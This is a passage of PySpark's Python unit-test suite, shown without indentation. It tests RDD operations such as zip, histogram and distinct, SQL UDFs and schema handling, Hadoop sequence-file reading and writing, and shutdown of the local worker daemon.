self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEquals(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(range(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.04) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.5))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals([4], rdd.histogram([0, 10])[1])
self.assertEquals([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEquals([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEquals([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEquals([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEquals(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEquals(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEquals((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEquals([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
# mixed RDD
rdd = self.sc.parallelize([1, 4, "ab", "ac", "b"], 2)
self.assertEquals([1, 1], rdd.histogram([0, 4, 10])[1])
self.assertEquals([2, 1], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals(([1, "b"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEquals(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEquals(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEquals(rdd.getNumPartitions(), 10)
self.assertEquals(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEquals(result.getNumPartitions(), 5)
self.assertEquals(result.count(), 3)
class TestSQL(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.sqlCtx = SQLContext(self.sc)
def test_udf(self):
self.sqlCtx.registerFunction("twoArgs", lambda x, y: len(x) + y, IntegerType())
[row] = self.sqlCtx.sql("SELECT twoArgs('test', 1)").collect()
self.assertEqual(row[0], 5)
def test_broadcast_in_udf(self):
bar = {"a": "aa", "b": "bb", "c": "abc"}
foo = self.sc.broadcast(bar)
self.sqlCtx.registerFunction("MYUDF", lambda x: foo.value[x] if x else '')
[res] = self.sqlCtx.sql("SELECT MYUDF('c')").collect()
self.assertEqual("abc", res[0])
[res] = self.sqlCtx.sql("SELECT MYUDF('')").collect()
self.assertEqual("", res[0])
def test_basic_functions(self):
rdd = self.sc.parallelize(['{"foo":"bar"}', '{"foo":"baz"}'])
srdd = self.sqlCtx.jsonRDD(rdd)
srdd.count()
srdd.collect()
srdd.schemaString()
srdd.schema()
# cache and checkpoint
self.assertFalse(srdd.is_cached)
srdd.persist()
srdd.unpersist()
srdd.cache()
self.assertTrue(srdd.is_cached)
self.assertFalse(srdd.isCheckpointed())
self.assertEqual(None, srdd.getCheckpointFile())
srdd = srdd.coalesce(2, True)
srdd = srdd.repartition(3)
srdd = srdd.distinct()
srdd.intersection(srdd)
self.assertEqual(2, srdd.count())
srdd.registerTempTable("temp")
srdd = self.sqlCtx.sql("select foo from temp")
srdd.count()
srdd.collect()
def test_distinct(self):
rdd = self.sc.parallelize(['{"a": 1}', '{"b": 2}', '{"c": 3}']*10, 10)
srdd = self.sqlCtx.jsonRDD(rdd)
self.assertEquals(srdd.getNumPartitions(), 10)
self.assertEquals(srdd.distinct().count(), 3)
result = srdd.distinct(5)
self.assertEquals(result.getNumPartitions(), 5)
self.assertEquals(result.count(), 3)
def test_apply_schema_to_row(self):
srdd = self.sqlCtx.jsonRDD(self.sc.parallelize(["""{"a":2}"""]))
srdd2 = self.sqlCtx.applySchema(srdd.map(lambda x: x), srdd.schema())
self.assertEqual(srdd.collect(), srdd2.collect())
rdd = self.sc.parallelize(range(10)).map(lambda x: Row(a=x))
srdd3 = self.sqlCtx.applySchema(rdd, srdd.schema())
self.assertEqual(10, srdd3.count())
def test_serialize_nested_array_and_map(self):
d = [Row(l=[Row(a=1, b='s')], d={"key": Row(c=1.0, d="2")})]
rdd = self.sc.parallelize(d)
srdd = self.sqlCtx.inferSchema(rdd)
row = srdd.first()
self.assertEqual(1, len(row.l))
self.assertEqual(1, row.l[0].a)
self.assertEqual("2", row.d["key"].d)
l = srdd.map(lambda x: x.l).first()
self.assertEqual(1, len(l))
self.assertEqual('s', l[0].b)
d = srdd.map(lambda x: x.d).first()
self.assertEqual(1, len(d))
self.assertEqual(1.0, d["key"].c)
row = srdd.map(lambda x: x.d["key"]).first()
self.assertEqual(1.0, row.c)
self.assertEqual("2", row.d)
class TestIO(PySparkTestCase):
def test_stdout_redirection(self):
import subprocess
def func(x):
subprocess.check_call('ls', shell=True)
self.sc.parallelize([1]).foreach(func)
class TestInputFormat(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
self.sc._jvm.WriteInputFormatTestDataGenerator.generateData(self.tempdir.name, self.sc._jsc)
def tearDown(self):
PySparkTestCase.tearDown(self)
shutil.rmtree(self.tempdir.name)
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.assertEqual(maps, em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
ec = (u'1',
{u'__class__': u'org.apache.spark.api.python.TestWritable',
u'double': 54.0, u'int': 123, u'str': u'test1'})
self.assertEqual(clazz[0], ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
batchSize=1).collect())
self.assertEqual(unbatched_clazz[0], ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
oldconf = {"mapred.input.dir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
newconf = {"mapred.input.dir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
class TestOutputFormat(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
PySparkTestCase.tearDown(self)
shutil.rmtree(self.tempdir.name, ignore_errors=True)
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = sorted(self.sc.sequenceFile(basepath + "/sfmap/").collect())
self.assertEqual(maps, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = sorted(self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
self.assertEqual(result, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapred.output.dir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/olddataset/"}
old_dataset = sorted(self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect())
self.assertEqual(old_dataset, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.Text",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = zip(x, y)
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/newdataset"}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_unbatched_save_and_read(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei, len(ei)).saveAsSequenceFile(
basepath + "/unbatched/")
unbatched_sequence = sorted(self.sc.sequenceFile(
basepath + "/unbatched/",
batchSize=1).collect())
self.assertEqual(unbatched_sequence, ei)
unbatched_hadoopFile = sorted(self.sc.hadoopFile(
basepath + "/unbatched/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
batchSize=1).collect())
self.assertEqual(unbatched_hadoopFile, ei)
unbatched_newAPIHadoopFile = sorted(self.sc.newAPIHadoopFile(
basepath + "/unbatched/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
batchSize=1).collect())
self.assertEqual(unbatched_newAPIHadoopFile, ei)
oldconf = {"mapred.input.dir": basepath + "/unbatched/"}
unbatched_hadoopRDD = sorted(self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=oldconf,
batchSize=1).collect())
self.assertEqual(unbatched_hadoopRDD, ei)
newconf = {"mapred.input.dir": basepath + "/unbatched/"}
unbatched_newAPIHadoopRDD = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=newconf,
batchSize=1).collect())
self.assertEqual(unbatched_newAPIHadoopRDD, ei)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class TestDaemon(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shutdown the worker
sock.send("\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
daemon = Popen([sys.executable, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
